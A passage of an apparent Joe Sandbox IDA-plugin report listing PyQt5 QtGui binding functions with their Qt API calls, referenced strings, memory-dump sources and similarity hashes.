Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?width@FromLongLong_Pen@@
String ID: QPen$width$width(self) -> int
API String ID: 1156614087-2596394453
Opcode ID: d570f43a1e008b2fe309510de73064ed3606fe7a08dfc4af9556d2ad174cb9a4
Instruction ID: 9f0288ac937d10f4b0e54b0e27c5e8ce39c50155a148e4a214b7ed8e9144566e
Opcode Fuzzy Hash: d570f43a1e008b2fe309510de73064ed3606fe7a08dfc4af9556d2ad174cb9a4
Instruction Fuzzy Hash: 22012C75B08B4AC1EB009F64E8696AD33A4FB84B60F950072CA5C43324EF7DED4AC780

Function 00007FFD8628A200 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

?showShortcutsInContextMenus@QStyleHints@@QEBA_NXZ.QT5GUI ref: 00007FFD8628A24B
PyBool_FromLong.PYTHON3 ref: 00007FFD8628A254

Strings

showShortcutsInContextMenus, xrefs: 00007FFD8628A272
showShortcutsInContextMenus(self) -> bool, xrefs: 00007FFD8628A266
QStyleHints, xrefs: 00007FFD8628A279

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?showBool_ContextFromHints@@LongMenus@ShortcutsStyle
String ID: QStyleHints$showShortcutsInContextMenus$showShortcutsInContextMenus(self) -> bool
API String ID: 4127199736-610601026
Opcode ID: ac5f605a7ac073320df1370ad262d434948cb0d1e90781d41d1587ee6ea5d738
Instruction ID: 143bb09c81de06873724c4f0df75cba78c9b214f3946dda551bc7c4f40192ec0
Opcode Fuzzy Hash: ac5f605a7ac073320df1370ad262d434948cb0d1e90781d41d1587ee6ea5d738
Instruction Fuzzy Hash: 01012835B08A46D1EB00EF65E8A86AC33A4FB54BA0F954072CA5D47320DF7DD949C380

Function 00007FFD862B21F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isClosed@QPolygonF@@QEBA_NXZ.QT5GUI ref: 00007FFD862B223B
PyBool_FromLong.PYTHON3 ref: 00007FFD862B2244

Strings

isClosed(self) -> bool, xrefs: 00007FFD862B2256
isClosed, xrefs: 00007FFD862B2262
QPolygonF, xrefs: 00007FFD862B2269

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_Closed@FromLongPolygon
String ID: QPolygonF$isClosed$isClosed(self) -> bool
API String ID: 38416347-3672193711
Opcode ID: 3fdf80f55ca0f4ee5c294e5296db36223a4c67526f06c2206409ad96b8989610
Instruction ID: 2b53aeea42647b753151f302098db33b9ba6bdf70338c5d25e884d4096032f0a
Opcode Fuzzy Hash: 3fdf80f55ca0f4ee5c294e5296db36223a4c67526f06c2206409ad96b8989610
Instruction Fuzzy Hash: 79012875B08B8AD1EB00AF54E8A96AC33A4FB54B61F950072CA5D43330DF7DDA59C340

Function 00007FFD8624EE50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?joinStyle@QPen@@QEBA?AW4PenJoinStyle@Qt@@XZ.QT5GUI ref: 00007FFD8624EE9B
PyLong_FromLong.PYTHON3 ref: 00007FFD8624EEA3

Strings

status(self) -> int, xrefs: 00007FFD8624EEB5
QPictureIO, xrefs: 00007FFD8624EEC8
status, xrefs: 00007FFD8624EEC1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Style@$?joinFromJoinLongLong_Pen@@Qt@@
String ID: QPictureIO$status$status(self) -> int
API String ID: 104565962-2482538358
Opcode ID: 9364b8187ec50903f7674e9f3c2345507b88da14630cdb16ed0399159b3f2517
Instruction ID: a7d232ba4f6a5cb133e47cb64a3aef6500ab017679fdcc992e182e8179c15898
Opcode Fuzzy Hash: 9364b8187ec50903f7674e9f3c2345507b88da14630cdb16ed0399159b3f2517
Instruction Fuzzy Hash: 68012C75B08A46D1EB00EF64E8A86AD33A4FB44B60F954072CA5D43320DF7DDA99C340

Function 00007FFD86240A80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?textWidth@QTextDocument@@QEBANXZ.QT5GUI ref: 00007FFD86240ACB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86240AD1

Strings

textWidth, xrefs: 00007FFD86240AEF
textWidth(self) -> float, xrefs: 00007FFD86240AE3
QTextDocument, xrefs: 00007FFD86240AF6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?textDocument@@DoubleFloat_FromTextWidth@
String ID: QTextDocument$textWidth$textWidth(self) -> float
API String ID: 3796594895-3771600890
Opcode ID: bb370cd49086aca7973ed27c4e5027852d7008e0df24fc0eaf2e7c9a5decfa3d
Instruction ID: fd704ed7a75fece21b25dbecb7f26815c9a863e9587f803cf1b15dcd5c82b282
Opcode Fuzzy Hash: bb370cd49086aca7973ed27c4e5027852d7008e0df24fc0eaf2e7c9a5decfa3d
Instruction Fuzzy Hash: 1D01E875B08A46C1EB00AF64E8A96AD33A4FB54B64F954072CA5D43320DF7DDE8AC780

Function 00007FFD8623AAB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?ascent@QTextItem@@QEBANXZ.QT5GUI ref: 00007FFD8623AAFB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8623AB01

Strings

ascent(self) -> float, xrefs: 00007FFD8623AB13
QTextItem, xrefs: 00007FFD8623AB26
ascent, xrefs: 00007FFD8623AB1F

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?ascent@DoubleFloat_FromItem@@Text
String ID: QTextItem$ascent$ascent(self) -> float
API String ID: 2017382620-4175672257
Opcode ID: 4c003e54c9cdc42c19a3d92a7b80d5aef98c107f2dfe61cca3348850e2995608
Instruction ID: b324a05d3d0ed67e6f47a1764e513a5c7ea7683f680de38a06f557cda74cc07e
Opcode Fuzzy Hash: 4c003e54c9cdc42c19a3d92a7b80d5aef98c107f2dfe61cca3348850e2995608
Instruction Fuzzy Hash: 70011631B08A4681EB00AF64E8A96AC33A4FB54BA4F950072CA4D43320DF7DEA4AC340

Function 00007FFD86230F50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?width@QTextLine@@QEBANXZ.QT5GUI ref: 00007FFD86230F9B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86230FA1

Strings

width(self) -> float, xrefs: 00007FFD86230FB3
width, xrefs: 00007FFD86230FBF
QTextLine, xrefs: 00007FFD86230FC6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?width@DoubleFloat_FromLine@@Text
String ID: QTextLine$width$width(self) -> float
API String ID: 4090434334-1184425339
Opcode ID: 04a8afe2f3a64f19ea35cf4b608e3d271e3606b67c731ece4ff7b2c9af03a0b2
Instruction ID: 46dd58df32084d3a6ea32d3b4faabc6620c1c70c7932067beacc26cf57be0c55
Opcode Fuzzy Hash: 04a8afe2f3a64f19ea35cf4b608e3d271e3606b67c731ece4ff7b2c9af03a0b2
Instruction Fuzzy Hash: 3A011A31B08A4681EB00AF64E8686AC33A4FB44BA4F950072CA4C03320DF7DED4AC340

Function 00007FFD86263040 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?bottomMargin@QTextFrameFormat@@QEBANXZ.QT5GUI ref: 00007FFD8626308B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86263091

Strings

QTextFrameFormat, xrefs: 00007FFD862630B6
bottomMargin(self) -> float, xrefs: 00007FFD862630A3
bottomMargin, xrefs: 00007FFD862630AF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?bottomDoubleFloat_Format@@FrameFromMargin@Text
String ID: QTextFrameFormat$bottomMargin$bottomMargin(self) -> float
API String ID: 1851153108-1477054750
Opcode ID: 3dc81143f772af6dfd14a5b9d26962b5229b8ae04eac7325fd6ca53d8d0cc7ce
Instruction ID: 050ae7e734abc2eef540d0ef990cc54c93ebb6686b106ca567c0c30ac748543e
Opcode Fuzzy Hash: 3dc81143f772af6dfd14a5b9d26962b5229b8ae04eac7325fd6ca53d8d0cc7ce
Instruction Fuzzy Hash: B5010831B08A46D1EB00AF54E8986A933A4FB54B64F950072CA4D43320DF7DDA49C740

Function 00007FFD862A5030 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?opacity@QPainter@@QEBANXZ.QT5GUI ref: 00007FFD862A507B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD862A5081

Strings

QPainter, xrefs: 00007FFD862A50A6
opacity, xrefs: 00007FFD862A509F
opacity(self) -> float, xrefs: 00007FFD862A5093

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?opacity@DoubleFloat_FromPainter@@
String ID: QPainter$opacity$opacity(self) -> float
API String ID: 527007235-953969989
Opcode ID: 6bbd53f59038c6cf930a15ec4fc7dc0b8578c488e44c76d9cfdbdf500cffd9f8
Instruction ID: e1f65638221b2dc886d27e41a1debf44199d70071287beff151f26b5bf91aad4
Opcode Fuzzy Hash: 6bbd53f59038c6cf930a15ec4fc7dc0b8578c488e44c76d9cfdbdf500cffd9f8
Instruction Fuzzy Hash: DD012871B18A86C1EB00AF54E8A86AD37A4FB44B65F950072CA4C43320DF7DDE49C380

Function 00007FFD86257020 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?physicalDotsPerInch@QScreen@@QEBANXZ.QT5GUI ref: 00007FFD8625706B
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86257071

Strings

physicalDotsPerInch, xrefs: 00007FFD8625708F
physicalDotsPerInch(self) -> float, xrefs: 00007FFD86257083
QScreen, xrefs: 00007FFD86257096

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?physicalDotsDoubleFloat_FromInch@Screen@@
String ID: QScreen$physicalDotsPerInch$physicalDotsPerInch(self) -> float
API String ID: 2192385660-2174523527
Opcode ID: 75b4d3aab5f9f336ef17c5c9fc6f3e663e4e40e99ec87ae721f6b0352398143f
Instruction ID: 6e17ba7d24ab31e197caa017334d5a083a7f91f1115a1579dff02d8348017c7e
Opcode Fuzzy Hash: 75b4d3aab5f9f336ef17c5c9fc6f3e663e4e40e99ec87ae721f6b0352398143f
Instruction Fuzzy Hash: 0C01E875B08A4AC1EB00AF54E8A86AD37A4FB44B64F954072CA5D43330DF7DEE9AC340

Function 00007FFD86240C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

?idealWidth@QTextDocument@@QEBANXZ.QT5GUI ref: 00007FFD86240CAB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD86240CB1

Strings

idealWidth, xrefs: 00007FFD86240CCF
idealWidth(self) -> float, xrefs: 00007FFD86240CC3
QTextDocument, xrefs: 00007FFD86240CD6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
